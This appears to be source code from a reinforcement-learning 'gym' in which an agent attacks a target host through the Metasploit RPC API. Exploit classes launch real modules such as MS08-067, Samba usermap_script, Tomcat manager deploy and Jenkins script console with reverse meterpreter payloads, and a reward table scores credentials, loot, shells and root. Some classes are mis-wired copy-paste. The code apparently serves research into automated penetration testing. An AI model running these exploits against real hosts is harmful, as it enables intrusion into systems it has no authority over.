exploit["RHOSTS"] = host 186 | exploit["RPORT"] = port 187 | job_info = exploit.execute(payload="cmd/unix/interact") 188 | wait_for_job_completion(job_info, client) 189 | 190 | 191 | class JavaRMIServer(Exploit): 192 | """[summary] 193 | https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/multi/misc/java_rmi_server.rb 194 | Args: 195 | Exploit ([type]): [description] 196 | """ 197 | 198 | def __init__(self, target=(0, 0)): 199 | self.name = "Java_RMI_Server" 200 | self.service = "http" 201 | self.target = target 202 | self.req_access = None 203 | self.req_os = None 204 | self.req_version = None 205 | super(Exploit, self).__init__( 206 | self.name, self.target, self.req_access, self.req_os, self.req_version 207 | ) 208 | 209 | def execute(self, client, host, port=1099): 210 | """ 211 | :param client: metasploit client object 212 | :param host: string representing IP of the target 213 | :param port: default port 21 214 | :return: 215 | """ 216 | exploit = client.modules.use("exploit", "multi/misc/java_rmi_server") 217 | exploit["RHOSTS"] = host 218 | exploit["RPORT"] = port 219 | exploit.execute(cmd="java/meterpreter/reverse_https") 220 | 221 | 222 | class Ms08_067_Netapi(Exploit): 223 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms08_067_netapi.rb 224 | Classic smb exploitation through crafted rpc packet. Works great on windows xp. 225 | 226 | Args: 227 | Exploit ([type]): [description] 228 | """ 229 | 230 | def __init__(self, target=(0, 0)): 231 | self.name = "ms08_067_netapi" 232 | self.service = "Microsoft-DS" 233 | self.target = target 234 | self.req_access = None 235 | self.req_os = "win" 236 | self.req_version = None 237 | super(Exploit, self).__init__( 238 | self.name, self.target, self.req_access, self.req_os, self.req_version 239 | ) 240 | 241 | def execute(self, client, host, port=445): 242 | """ 243 | :param client: metasploit client object 244 | :param host: string representing IP of the target 245 | :param port: default port 21 246 | :return: 247 | """ 248 | exploit = client.modules.use("exploit", "windows/smb/ms08_067_netapi") 249 | exploit["RHOSTS"] = host 250 | exploit["RPORT"] = port 251 | job_info = exploit.execute(cmd="windows/meterpreter/reverse_https") 252 | wait_for_job_completion(job_info, client) 253 | 254 | 255 | class ManageEngine_Auth_Upload(Exploit): 256 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/manageengine_auth_upload.rb 257 | 258 | Http upload that allows remote code execution on ManageEngine ServiceDesk 259 | 260 | TODO: Find a vulnerable copy of this for building environments. oy vey. 261 | Args: 262 | Exploit ([type]): [description] 263 | """ 264 | 265 | def __init__(self, target=(0, 0)): 266 | self.name = "ManageEngine_Auth_Upload" 267 | self.service = "http" 268 | self.target = target 269 | self.req_access = None 270 | self.req_os = None 271 | self.req_version = None 272 | super(Exploit, self).__init__( 273 | self.name, self.target, self.req_access, self.req_os, self.req_version 274 | ) 275 | 276 | def execute(self, client, host, port=8080): 277 | """ 278 | :param client: metasploit client object 279 | :param host: string representing IP of the target 280 | :param port: default port 21 281 | :return: 282 | """ 283 | exploit = client.modules.use("exploit", "multi/http/manageengine_auth_upload") 284 | exploit["RHOSTS"] = host 285 | exploit["RPORT"] = port 286 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 287 | wait_for_job_completion(job_info, client) 288 | 289 | 290 | class ApacheJamesExecution(Exploit): 291 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/smtp/apache_james_exec.rb 292 | 293 | 'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write" 294 | 295 | Args: 296 | Exploit ([type]): [description] 297 | """ 298 | 299 | def __init__(self, target=(0, 0)): 300 | self.name = "Apache_James_InsecureUserCreation" 301 | self.service = "smpt" 302 | self.target = target 303 | self.req_access = None 304 | self.req_os = "linux" 305 | self.req_version = None 306 | super(Exploit, self).__init__( 307 | self.name, self.target, self.req_access, self.req_os, self.req_version 308 | ) 309 | 310 | def execute(self, client, host, port=8080): 311 | """ 312 | :param client: metasploit client object 313 | :param host: string representing IP of the target 314 | :param port: default port 21 315 | :return: 316 | """ 317 | exploit = client.modules.use("exploit", "multi/http/manageengine_auth_upload") 318 | exploit["RHOSTS"] = host 319 | exploit["RPORT"] = port 320 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 321 | wait_for_job_completion(job_info, client) 322 | 323 | 324 | class SambaUsermapScript(Exploit): 325 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/samba/usermap_script.rb 326 | 327 | 'Name' => "Samba "username map script" Command Execution" 328 | 329 | Args: 330 | Exploit ([type]): [description] 331 | """ 332 | 333 | def __init__(self, target=(0, 0)): 334 | self.name = "Samba_Usermap_Script" 335 | self.target = target 336 | self.service = "NetBIOS-SSN" 337 | self.req_access = None 338 | self.req_os = "multi" 339 | self.req_version = None 340 | super(Exploit, self).__init__( 341 | self.name, self.target, self.req_access, self.req_os, self.req_version 342 | ) 343 | 344 | def execute(self, client, host, port=139): 345 | """ 346 | :param client: metasploit client object 347 | :param host: string representing IP of the target 348 | :param port: default port 139 349 | :return: 350 | """ 351 | exploit = client.modules.use("exploit", "multi/samba/usermap_script") 352 | exploit["RHOSTS"] = host 353 | exploit["RPORT"] = port 354 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 355 | wait_for_job_completion(job_info, client) 356 | 357 | 358 | class ApacheTomcatAuthenticationCodeExecution(Exploit): 359 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_mgr_deploy.rb 360 | 361 | 'Name' => "Apache Tomcat Manager Application Deployer Authenticated Code Execution" 362 | 363 | Args: 364 | Exploit ([type]): [description] 365 | """ 366 | 367 | def __init__(self, target=(0, 0)): 368 | self.name = "Apache_Tomcat_Execution" 369 | self.target = target 370 | self.service = "http" 371 | self.req_access = None 372 | self.req_os = "multi" 373 | self.req_version = None 374 | super(Exploit, self).__init__( 375 | self.name, self.target, self.req_access, self.req_os, self.req_version 376 | ) 377 | 378 | def execute(self, client, host, port=8080): 379 | """ 380 | :param client: metasploit client object 381 | :param host: string representing IP of the target 382 | :param port: default port None 383 | :return: 384 | """ 385 | exploit = client.modules.use("exploit", "multi/http/tomcat_mgr_deploy") 386 | exploit["RHOSTS"] = host 387 | exploit["RPORT"] = port 388 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 389 | wait_for_job_completion(job_info, client) 390 | 391 | 392 | class Jenkins_CI_Script_Java_Execution(Exploit): 393 | """https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_script_console.rb 394 | 395 | 'Name' => "Jenkins-CI Script-Console Java Execution" 396 | 397 | Args: 398 | Exploit ([type]): [description] 399 | """ 400 | 401 | def __init__(self, target=(0, 0)): 402 | self.name = "Jenkins_CI_Script_Console_Java_Execution" 403 | self.service = "http" 404 | self.target = target 405 | self.req_access = None 406 | self.req_os = "multi" 407 | self.req_version = None 408 | super(Exploit, self).__init__( 409 | self.name, self.target, self.req_access, self.req_os, self.req_version 410 | ) 411 | 412 | def execute(self, client, host, port=8080): 413 | """ 414 | :param client: metasploit client object 415 | :param host: string representing IP of the target 416 | :param port: default port 8080 417 | :return: 418 | """ 419 | exploit = client.modules.use("exploit", "multi/http/jenkins_script_console") 420 | exploit["RHOSTS"] = host 421 | exploit["RPORT"] = port 422 | job_info = exploit.execute(cmd="java/meterpreter/reverse_https") 423 | wait_for_job_completion(job_info, client) 424 | -------------------------------------------------------------------------------- /metasploit_gym/action/privilege_escalation.py: -------------------------------------------------------------------------------- 1 | """Privilege Escalation actions 2 | """ 3 | from .action import PrivilegeEscalation 4 | 5 | 6 | class GetSystem(PrivilegeEscalation): 7 | def __init__(self): 8 | """Metasploit literally just tries tons of stuff 9 | Including but not limited to this stuff https://cd6629.gitbook.io/ctfwriteups/windows-privesc 10 | aka services running as system with user-configurable startup binaries and stuff. 11 | 12 | https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/ 13 | 14 | """ 15 | super(GetSystem, self).__init__() 16 | self.req_platform = "windows" 17 | 18 | 19 | class GetRoot(PrivilegeEscalation): 20 | """wherein our 'action' is actually trying the linux suggester, parsing its contents to determine if any are viable, and running those that are 21 | 22 | aka the attached link shows documentation of a metasploit module that, when run, suggests a series of 23 | local privilege escalation techniques for linux, and whether it seems like the machine in question is vulnerable. we can then run any/all of these, 24 | basically the same as 'getsystem 25 | 26 | https://null-byte.wonderhowto.com/how-to/get-root-with-metasploits-local-exploit-suggester-0199463/ 27 | """ 28 | 29 | def __init__(self): 30 | super(GetRoot, self).__init__() 31 | self.req_platform = "linux" 32 | -------------------------------------------------------------------------------- /metasploit_gym/action/scan.py: -------------------------------------------------------------------------------- 1 | """Scanning actions 2 | """ 3 | from .action import Scan 4 | from pymetasploit3.msfconsole import MsfRpcConsole 5 | from pymetasploit3.msfrpc import MsfRpcMethod 6 | import time 7 | 8 | 9 | class PortScan(Scan): 10 | """The port scan will be our only scan, at first. 11 | It will represent the biggest, heaviest, and dumbest scan metasploit has. 12 | All ports, all services, looking for version numbers. It will be capable of giving us a "full starting state" 13 | of any machine we currently have subnet access to. 14 | """ 15 | 16 | def __init__(self, target=(0, 0)): 17 | self.name = "PortScan" 18 | self.target = target 19 | self.req_access = None 20 | self.req_os = None 21 | self.req_version = None 22 | super(Scan, self).__init__( 23 | self.name, self.target, self.req_access, self.req_os, self.req_version 24 | ) 25 | 26 | def execute(self, client, host): 27 | """ 28 | Using the metasploit client, perform the action required 29 | TODO: Hold until you can confirm the action is completed to allow the calling function to observe state 30 | :param client: a metasploit client that can have the action run 31 | :return: 32 | """ 33 | c_id = client.call(MsfRpcMethod.ConsoleCreate)["id"] 34 | client.consoles.console(c_id).write(f"db_nmap {host}\n") 35 | out = client.consoles.console(c_id).read()["data"] 36 | timeout = 150 37 | counter = 0 38 | while counter < timeout: 39 | out += client.consoles.console(c_id).read()["data"] 40 | if "Nmap done" in out: 41 | break 42 | time.sleep(1) 43 | counter += 1 44 | -------------------------------------------------------------------------------- /metasploit_gym/host/network.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | 3 | from ..action.action import Exploit 4 | from .utils import SERVICES_TCP, REWARDS 5 | 6 | 7 | class Network: 8 | """Collect of Hosts objects, with helper functions for comparing them 9 | """ 10 | def __init__(self, max_subnets, max_hosts_per_subnet): 11 | self.hosts = [] 12 | self.max_subnets = max_subnets 13 | self.max_hosts_per_subnet = max_hosts_per_subnet 14 | self.num_exploits = len(Exploit.__subclasses__()) 15 | self.host_vector_size = self.calculate_host_vector_size() 16 | 17 | def max_reward(self): 18 | """Returns the maximum reward. Currently this is configured to be gaining root access to a host. 19 | Configurable in utils.py 20 | 21 | Returns: 22 | int: The value of 'root' in the Rewards dictionary 23 | """ 24 | return REWARDS["root"] 25 | 26 | def check_host_exists(self, board_address): 27 | """Checks if board address represents a new host or one already occupied. 28 | 29 | Args: 30 | board_address (str): Address 31 | 32 | Returns: 33 | bool: True if the Network object knows about the machine, False otherwise 34 | """ 35 | for host in self.hosts: 36 | if host.board_address == board_address: 37 | return True 38 | else: 39 | return False 40 | 41 | def compare_updated_host(self, updated_host): 42 | """Pulls clean data from Metasploits database to see if the last action earned 43 | any reward for the host 44 | 45 | Args: 46 | updated_host (Host): New Host object to be compared to the networks current objects 47 | 48 | Raises: 49 | ValueError: Raised if the host is new and can't be compared to old data 50 | 51 | Returns: 52 | _type_: _description_ 53 | """ 54 | for host in self.hosts: 55 | if host.board_address == updated_host.board_address: 56 | reward = 0 57 | new_services = updated_host.service_count - host.service_count 58 | if new_services > 0: 59 | reward += new_services * REWARDS["services"] 60 | new_vulns = updated_host.vuln_count - host.vuln_count 61 | if new_vulns > 0: 62 | reward += new_vulns * REWARDS["vulns"] 63 | if updated_host.credentialed_access and not host.credentialed_access: 64 | # thats new creds 65 | reward += REWARDS["creds"] 66 | new_loot = updated_host.loot_count - host.loot_count 67 | if new_loot > 0: 68 | reward += new_loot * REWARDS["loot"] 69 | if updated_host.open_console and not host.open_console: 70 | reward += REWARDS["shell"] 71 | if updated_host.meterpreter_shell and not host.meterpreter_shell: 72 | reward += REWARDS["meterpreter"] 73 | return reward 74 | raise ValueError("Cannot compare updated host, this host is new") 75 | 76 | def update_host(self, updated_host): 77 | """After reward has been accounted for, updated Host list with new host 78 | 79 | Args: 80 | updated_host (Host): Most recent Host constructed from Metasploit database 81 | """ 82 | for i in range(len(self.hosts)): 83 | if self.hosts[i].board_address == updated_host.board_address: 84 | self.hosts[i] = updated_host 85 | 86 | def calculate_host_vector_size(self): 87 | """Quick math to calculate the desired size of our host vector 88 | 89 | Returns: 90 | int: Size of a flat host vector 91 | """ 92 | operating_systems = 2 93 | loot_slots = 1 # only one kind of loot for our purposes 94 | cred_slots = 1 # only one kind of cred for our purposes 95 | shell_types = 2 # regular and meterpreter 96 | privilege_levels = 5 97 | return ( 98 | self.max_subnets 99 | + self.max_hosts_per_subnet 100 | + operating_systems 101 | + len(SERVICES_TCP) 102 | + self.num_exploits 103 | + loot_slots 104 | + cred_slots 105 | + shell_types 106 | + privilege_levels 107 | ) 108 | 109 | def add_host(self, host): 110 | """Calculate rewards of host 111 | 112 | Args: 113 | host (Host): Host to have its rewards calculated 114 | 115 | Raises: 116 | TypeError: Raised if object is not of type Host 117 | ValueError: Raised if host has already been accounted for 118 | 119 | Returns: 120 | int: Reward amount of host 121 | """ 122 | reward = 0 123 | if not isinstance(host, Host): 124 | raise TypeError("Cannot add object to network unless it's of type Host") 125 | else: 126 | for current_host in self.hosts: 127 | if current_host.ip_address == host.ip_address: 128 | raise ValueError("Host is already added") 129 | new_services = host.service_count 130 | if new_services > 0: 131 | reward += new_services * REWARDS["services"] 132 | new_vulns = host.vuln_count 133 | if new_vulns > 0: 134 | reward += new_vulns * REWARDS["vulns"] 135 | if host.credentialed_access: 136 | reward += REWARDS["creds"] 137 | new_loot = host.loot_count 138 | if new_loot > 0: 139 | reward += new_loot * REWARDS["loot"] 140 | if host.open_console: 141 | reward += REWARDS["shell"] 142 | if host.meterpreter_shell: 143 | reward += REWARDS["meterpreter"] 144 | self.hosts.append(host) 145 | return reward 146 | 147 | def vectorize(self): 148 | if self.hosts == []: 149 | return np.zeros( 150 | ( 151 | self.calculate_host_vector_size(), 152 | self.max_subnets * self.max_hosts_per_subnet, 153 | ) 154 | ) 155 | array_list = [ 156 | self._network_tensor(self.hosts), 157 | self._os_tensor(self.hosts), 158 | self._services_tensor(self.hosts), 159 | self._vulns_tensor(self.hosts), 160 | self._loot_tensor(self.hosts), 161 | self._creds_tensor(self.hosts), 162 | self._shells_tensor(self.hosts), 163 | self._privilege_tensor(self.hosts), 164 | ] 165 | network_vector = np.concatenate(array_list) 166 | return network_vector 167 | 168 | def _services_tensor(self, hosts): 169 | """ 170 | 171 | :param hosts: 172 | :return: 173 | """ 174 | services_list = sorted(hosts[0].services.keys()) 175 | port_count = len(hosts[0].services) 176 | service_tensor = np.zeros((port_count, len(hosts))) 177 | for i in range(len(hosts)): 178 | host = hosts[i] 179 | for j in range(len(services_list)): 180 | port = services_list[j] 181 | if host.services[port]["status"] == True: 182 | service_tensor[j, i] = 1.0 183 | return service_tensor 184 | 185 | def _network_tensor(self, hosts): 186 | """ 187 | generate network 188 | """ 189 | # TODO: handle lookups for larger subnet amounts 190 | network_tensor = np.zeros( 191 | (self.max_subnets + self.max_hosts_per_subnet, len(hosts)) 192 | ) 193 | return network_tensor 194 | 195 | def _os_tensor(self, hosts): 196 | os_tensor = np.zeros( 197 | (2, len(hosts)) 198 | ) # two OSs, first is Windows second is Linux 199 | for i in range(len(hosts)): 200 | host = hosts[i] 201 | os_tensor[1, i] = 1.0 # setup Linux 202 | return os_tensor 203 | 204 | def _vulns_tensor(self, hosts): 205 | vulns_tensor = np.zeros((len(Exploit.__subclasses__()), len(hosts))) 206 | return vulns_tensor 207 | 208 | def _loot_tensor(self, hosts): 209 | loot_tensor = np.zeros((1, len(hosts))) 210 | for i in range(len(hosts)): 211 | host = hosts[i] 212 | loot_tensor[0, i] = host.loot_count 213 | return loot_tensor 214 | 215 | def _creds_tensor(self, hosts): 216 | cred_tensor = np.zeros((1, len(hosts))) 217 | for i in range(len(hosts)): 218 | host = hosts[i] 219 | if host.has_creds: 220 | cred_tensor[0, i] = 1.0 221 | return cred_tensor 222 | 223 | def _shells_tensor(self, hosts): 224 | shell_tensor = np.zeros((2, len(hosts))) 225 | for i in range(len(hosts)): 226 | host = hosts[i] 227 | if host.open_console: 228 | shell_tensor[0, i] = 1.0 229 | if host.meterpreter_shell: 230 | shell_tensor[1, i] = 1.0 231 | return shell_tensor 232 | 233 | def _privilege_tensor(self, hosts): 234 | privilege_tensor = np.zeros((5, len(hosts))) 235 | return privilege_tensor 236 | 237 | 238 | class Host: 239 | """A single host in the network 240 | 241 | NOTE: This represents the current state of the machine as observed by the agent, and not the 242 | TOTAL state of the machine. 243 | 244 | The host will keep track of the following properties: 245 | board_address [tuple] - e.g (0, 1) indicating subnet 0 and host 1. This will allow us to construct a matrix 246 | of what machines can communicate with what other machines so the agent can learn to understand pivoting 247 | 248 | ip_address [str] - e.g 127.0.0.1 this will indicate the actual address of the machine that metasploit can use to run exploits 249 | 250 | services [dict] - will start with a dict of all possible services as keys. the values will then be metasploit dictionaries representing service info 251 | 252 | vulns [dict] - will start with list of all vuln as keys, the values will then be metasploit dictionaries representing the vulns 253 | 254 | loots int - the number of loots acquired. 255 | 256 | creds - a dictionary of the level of access for creds, set to true if we have credentials with that access. also a reference to a file containing the login creds 257 | """ 258 | 259 | def __init__( 260 | self, 261 | board_address, 262 | ip_address, 263 | services, 264 | vulns=None, 265 | loot=None, 266 | creds=None, 267 | console=None, 268 | session=None, 269 | vector_size=None, 270 | ): 271 | self.board_address = board_address 272 | self.ip_address = ip_address 273 | self.services = self._construct_services(services) 274 | self.vector_size = vector_size 275 | self.loots = len(loot) 276 | self.has_creds = 1 if creds else 0 277 | self.has_open_console = 1 if console else 0 # denotes regular command shell 278 | self.has_open_session = 1 if session else 0 # denotes meterpreter 279 | self.vulns = vulns 280 | 281 | def _construct_services(self, services): 282 | """Use SERVICES_TCP in utils to create a dictionary of top services 283 | 284 | Args: 285 | services (dict): Dictionary representing current services in host 286 | 287 | Returns: 288 | dict: Dictionary representing active services in the host 289 | """ 290 | services_tcp = SERVICES_TCP.copy() 291 | for service in services: 292 | if service["port"] in services_tcp: 293 | target_service = services_tcp[service["port"]] 294 | if service["name"] == target_service["service"]: 295 | target_service["status"] = True 296 | return services_tcp 297 | 298 | @property 299 | def service_count(self): 300 | active_services = 0 301 | for port in self.services.keys(): 302 | service = self.services[port] 303 | if service["status"]: 304 | active_services += 1 305 | return active_services 306 | 307 | @property 308 | def vuln_count(self): 309 | return len(self.vulns) 310 | 311 | @property 312 | def credentialed_access(self): 313 | return self.has_creds 314 | 315 | @property 316 | def loot_count(self): 317 | return self.loots 318 | 319 | @property 320 | def meterpreter_shell(self): 321 | return self.has_open_session 322 | 323 | @property 324 | def open_console(self): 325 | return self.has_open_console 326 | 327 | def vectorize(self): 328 | vector = np.zeros(self.vector_size, dtype=np.float32) 329 | return vector 330 | -------------------------------------------------------------------------------- /metasploit_gym/host/utils.py: -------------------------------------------------------------------------------- 1 | SERVICES_TCP = { 2 | 80: {"service": "http", "status": False}, 3 | 23: {"service": "telnet", "status": False}, 4 | 443: {"service": "http", "status": False}, 5 | 21: {"service": "ftp", "status": False}, 6 | 22: {"service": "ssh", "status": False}, 7 | 25: {"service": "smpt", "status": False}, 8 | 3389: {"service": "ms-term-server", "status": False}, 9 | 110: {"service": "POP3", "status": False}, 10 | 445: {"service": "Microsoft-DS", "status": False}, 11 | 139: {"service": "NetBIOS-SSN", "status": False}, 12 | 5432: {"service": "postgresql", "status": False}, 13 | } 14 | 15 | REWARDS = { 16 | "vulns": 10, 17 | "services": 5, 18 | "creds": 15, 19 | "loot": 1, 20 | "root": 20, 21 | "shell": 5, 22 | "meterpreter": 8, 23 | } 24 | -------------------------------------------------------------------------------- /metasploit_gym/metasploit_env.py: -------------------------------------------------------------------------------- 1 | from gym import Env, spaces 2 | from gym.utils import seeding 3 | from pymetasploit3.msfrpc import MsfRpcClient 4 | from .action.action import Action, Exploit, Scan 5 | from .action.exploit import * 6 | from .action.scan import * 7 | from .host.network import Host, Network 8 | from dotenv import load_dotenv 9 | import os 10 | import time 11 | 12 | 13 | class MetasploitEnv(Env): 14 | def __init__(self): 15 | """ 16 | Will have all the required gym functionality and then also necessary stuff for our other two environments 17 | """ 18 | self.action_space = None # Space object corresponding to valid actions 19 | # Space object corresponding to valid observations 20 | self.observation_space = None 21 | self.reward_range = None # A tuple corresponding to the min and max possible rewards (default [-inf, +inf] ) 22 | 23 | def step(self, action): 24 | """Run one timestep of the environment's dynamics. When end of 25 | episode is reached, you are responsible for calling `reset()` to reset this 26 | environment's state. 27 | 28 | Accepts an action and returns a tuple (observation, reward, done, info). 29 | 30 | Args: 31 | action (object): An action provided by the agent 32 | 33 | Returns: 34 | observation (object): agent's observation of the current environment 35 | reward (float): amount of reward returned after previous acgtion 36 | done (bool): whether the episode has ended, in which case further step() calls return undefined results 37 | info (dict): Returns auxiliary diagnostic info 38 | """ 39 | raise NotImplementedError 40 | 41 | def reset(self): 42 | """Resets the environment to an initial state and returns an initial observation. 43 | 44 | Note that this function should not reset the environment's random number generators; 45 | random variables in the environment's state should be sampled independently between multiple calls to `reset()`. In 46 | other words each call of `reset()` should yield an environment suitable for a new episode, independent 47 | of previous episodes. 48 | 49 | Returns: 50 | observation (object): the initial observation. 51 | """ 52 | raise NotImplementedError 53 | 54 | def render(self, mode="human"): 55 | """Renders the environment. 56 | 57 | The set of supported modes varies per environment. By convention, if mode is: 58 | 59 | - human: render to the current display or terminal and return nothing for human consomptuon. 60 | - rgb_array: Return an numpy.ndarray with shape (x, y, 3), representing RGB values for x-by-y pixel image, suitable 61 | for turning into a video. 62 | - ansi: Return a string (str) or StringeIO.StringIO containing a terminal-style text representation 63 | 64 | Note: 65 | Make sure that your class's metadata `render.modes` key includes 66 | the list of supported mode. It's recommended to call super() in implementations 67 | to use the functionality of this method 68 | 69 | Example: 70 | class MyEnv(Env): 71 | metadata = {'render.modes': ['human', 'rgb_array']} 72 | def render(self, mode='human'): 73 | if mode == 'rgb_array': 74 | return np.array(...) # return RGB frame suitable for video 75 | elif mode == 'human': 76 | ... # pop up a window and render 77 | else: 78 | super(MyEnv, self).render(mode=mode) # just raise an exception 79 | 80 | """ 81 | raise NotImplementedError 82 | 83 | def close(self): 84 | """Override close in your subclass to perform necessary cleanup. 85 | 86 | Environments will automatically close() themselves when garbage collected or on program exit. 87 | """ 88 | raise NotImplementedError 89 | 90 | def seed(self, seed=None): 91 | """Sets the seed for this env's random number generator. 92 | 93 | Note: 94 | Some environments use multiple psuedorandom number generators. 95 | We want to capture all such seeds used in order to ensure that there aren't 96 | accidental correlations between multiple generators. 97 | 98 | Returns: 99 | list: Returns the list of seeds used in this env's random number generators. The first 100 | value in the list should be the "main" seed, or the value which a reproducer should pass to 'seed'. Often, 101 | the main seed equals the provided 'seed', but this won't be true if seed=None, for example. 102 | 103 | Args: 104 | seed ([type], optional): [description]. Defaults to None. 105 | 106 | Raises: 107 | NotImplementedError: [description] 108 | """ 109 | raise NotImplementedError 110 | 111 | 112 | class MetasploitNetworkEnv(MetasploitEnv): 113 | def __init__( 114 | self, reset_function, max_subnets=1, max_hosts_per_subnet=1, total_hosts=1 115 | ): 116 | super().__init__() 117 | load_dotenv() 118 | self.environment_reset_function = reset_function 119 | self.client = self.create_client() 120 | self.client.db.workspaces.add("metasploitgym") 121 | self.client.db.workspaces.set("metasploitgym") 122 | self.total_hosts = total_hosts 123 | # TODO: Replace this with CIDR address later 124 | self.target_host = os.getenv("TARGET_HOST", default=None) 125 | if self.target_host is None: 126 | raise ValueError( 127 | "Set TARGET_HOST in .env to use the metasploit network env" 128 | ) 129 | self.host_dict = {self.target_host: (0, 0)} # map vector to IP 130 | self.tcp_services = dict() # list of all services, and a 1 if it's up 131 | self.udp_services = dict() 132 | self.privileges = dict() 133 | self.loot = dict() 134 | self.max_subnets = max_subnets 135 | self.max_hosts_per_subnet = max_hosts_per_subnet 136 | self.action_space = FlatActionSpace( 137 | max_subnets=max_subnets, max_hosts_per_subnet=max_hosts_per_subnet 138 | ) 139 | self.network = Network( 140 | max_subnets=max_subnets, 141 | max_hosts_per_subnet=max_hosts_per_subnet, 142 | ) 143 | self.observation_space = spaces.Box( 144 | low=0, high=self.network.max_reward(), shape=self.network.vectorize().shape 145 | ) 146 | 147 | def create_client(self): 148 | metasploit_pass = os.getenv("METASPLOIT_PASSWORD", default=None) 149 | metasploit_port = os.getenv("METASPLOIT_PORT", default=None) 150 | metasploit_host = os.getenv("METASPLOIT_HOST", default=None) 151 | 152 | if ( 153 | metasploit_host is None 154 | or metasploit_port is None 155 | or metasploit_pass is None 156 | ): 157 | raise ValueError( 158 | "Please include a .env file with METASPLOIT_PASS, METASPLOIT_PORT, and METASPLOIT HOST set to the values of the msgrpc service" 159 | ) 160 | client = MsfRpcClient( 161 | metasploit_pass, server=metasploit_host, port=metasploit_port, ssl=True 162 | ) 163 | return client 164 | 165 | def calculate_board_address(self, ip): 166 | if ip in self.host_dict: 167 | return self.host_dict[ip] 168 | proposed_subnet = ip.split(".")[-2] 169 | amount_in_subnet = 0 170 | subnet_idx = None 171 | highest_subnet = 0 172 | for ip in self.host_dict.keys(): 173 | if (self.host_dict[ip])[0] > highest_subnet: 174 | highest_subnet = self.host_dict[ip][0] 175 | if ip.split(".")[-2] == proposed_subnet: 176 | amount_in_subnet += 1 177 | subnet_idx = self.host_dict[ip][0] # first part of tuple 178 | if amount_in_subnet > self.max_hosts_per_subnet: 179 | return None 180 | elif subnet_idx == None and highest_subnet >= self.max_hosts_per_subnet - 1: 181 | return None 182 | else: 183 | if subnet_idx is None: 184 | subnet_idx = highest_subnet + 1 185 | return (subnet_idx, 0) 186 | else: 187 | return (subnet_idx, amount_in_subnet) 188 | 189 | ### see if we have any slots left in this subnet 190 | 191 | def update_env(self): 192 | # get hosts. pull info for hosts in order 193 | # first check if we have open sessions and organize them by host 194 | # return new reward 195 | reward = 0 196 | open_meterpreter_sessions = {} 197 | open_console_sessions = {} 198 | 199 | session_keys = self.client.sessions.list 200 | for sid in session_keys: 201 | if session_keys[sid]["type"] == "meterpreter": 202 | hostname = session_keys[sid]["target_host"] 203 | open_meterpreter_sessions[hostname] = session_keys[sid] 204 | if session_keys[sid]["type"] == "shell": 205 | hostname = session_keys[sid]["target_host"] 206 | open_console_sessions[hostname] = session_keys[sid] 207 | 208 | hosts = ( 209 | self.client.db.workspaces.current.hosts.list 210 | ) # list of hosts we know about 211 | for host in hosts: 212 | address = host["address"] 213 | services = self.client.db.workspaces.current.services.find( 214 | addresses=[address] 215 | ) # list of services for those hosts 216 | vulns = self.client.db.workspaces.current.vulns.find( 217 | addresses=[address] 218 | ) # list of exploited vulns so far 219 | loot = self.client.db.workspaces.current.loots.find( 220 | addresses=[address] 221 | ) # loot taken from machines 222 | creds = self.client.db.workspaces.current.creds.find( 223 | addresses=[address] 224 | ) # credentials discovered 225 | if address in open_meterpreter_sessions: 226 | has_session = 1 227 | else: 228 | has_session = 0 229 | if address in open_console_sessions: 230 | has_console = 1 231 | else: 232 | has_console = 0 233 | # CALCULATE BOARD ADDRESS 234 | board_address = self.calculate_board_address(ip=address) 235 | if board_address: 236 | potential_host = Host( 237 | board_address=(0, 1), 238 | ip_address=address, 239 | services=services, 240 | vulns=vulns, 241 | loot=loot, 242 | creds=creds, 243 | console=has_console, 244 | session=has_session, 245 | vector_size=self.network.host_vector_size, 246 | ) 247 | else: 248 | continue 249 | if self.network.check_host_exists(potential_host.board_address) is True: 250 | reward += self.network.compare_updated_host(potential_host) 251 | self.network.update_host(potential_host) 252 | else: 253 | reward += self.network.add_host(potential_host) 254 | # need to find way to derive privileges 255 | return reward 256 | 257 | def step(self, action): 258 | """ 259 | This function validates the action that is to be taken, making sure it is a legal action. 260 | That includes that the subnet and host exist in the lookup table, and that the action can correctly be applied to the host. 261 | :param action: an object of type Action 262 | :return: Observation, reward, done, debug info 263 | """ 264 | if not issubclass(type(action), Action): 265 | raise TypeError( 266 | "Only actions of type Action can be processed by the MetasploitNetworkEnv" 267 | ) 268 | board_addr_to_host = dict( 269 | [(value, key) for key, value in self.host_dict.items()] 270 | ) 271 | 272 | if action.target in board_addr_to_host: 273 | host_addr = board_addr_to_host[action.target] 274 | else: 275 | raise KeyError( 276 | f"Chosen target {action.target} does not exist in current host_dict" 277 | ) 278 | print(action) 279 | action.execute(self.client, host_addr) 280 | time.sleep(5) # let end of execution play out, for example VSFTPD 281 | # use kwargs to just pass all the info we have and let the action decide what it needs? 282 | # load relevant service port 283 | # - the host the action is being taken against 284 | reward = self.update_env() # update env 285 | # calculate reward based on 286 | debugging_info = {} 287 | return self.network.vectorize(), reward, self.goal_reached(), debugging_info 288 | 289 | def reset(self): 290 | # reset data structures that make up network 291 | # return initial observation 292 | self.host_dict = {self.target_host: (0, 0)} 293 | self.tcp_services = dict() 294 | self.udp_services = dict() 295 | self.privileges = dict() 296 | self.loot = dict() 297 | self.network = Network( 298 | max_subnets=self.max_subnets, 299 | max_hosts_per_subnet=self.max_hosts_per_subnet, 300 | num_exploits=len(self.action_space), 301 | ) 302 | # have to remove sessions seperately, lets close them 303 | for session in self.client.sessions.list: 304 | session_obj = self.client.sessions.session(session) 305 | session_obj.stop() 306 | # reset client database by removing current workspace, then add new workspace with same name 307 | self.client.db.workspaces.remove("metasploitgym") 308 | # then add a new one 309 | self.client.db.workspaces.add("metasploitgym") 310 | self.client.db.workspaces.set("metasploitgym") 311 | self.environment_reset_function() 312 | return self.network.vectorize() 313 | 314 | def goal_reached(self): 